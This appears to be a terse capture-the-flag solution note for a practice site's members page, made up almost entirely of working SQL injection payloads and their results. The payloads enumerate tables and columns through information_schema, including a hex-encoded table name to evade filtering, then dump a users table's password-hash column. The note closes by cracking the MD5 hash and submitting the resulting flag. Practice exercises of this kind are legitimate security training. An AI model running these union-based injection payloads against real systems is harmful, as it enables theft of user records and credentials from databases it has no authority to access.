:: INJECTION SQL MEMBERS
=>  GET TABLE NAME
1 and 1=0 union select null,table_name from information_schema.tables limit 0,50-- -
===>
db_default,users,guestbook,list_images,vote_dbs

(1)and(1)=(0)union(select(null),group_concat(column_name)from(information_schema.columns)where(table_name)=(0x7573657273))#
===>
user_id,first_name,last_name,town,country,planet,Commentaire,countersign

1 and 1=0 union select Commentaire,countersign from users limit 0,5-- -
THEN DECRYPT MD5 THEN HASHIT TO SHA256
MEMBERS FLAG : 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5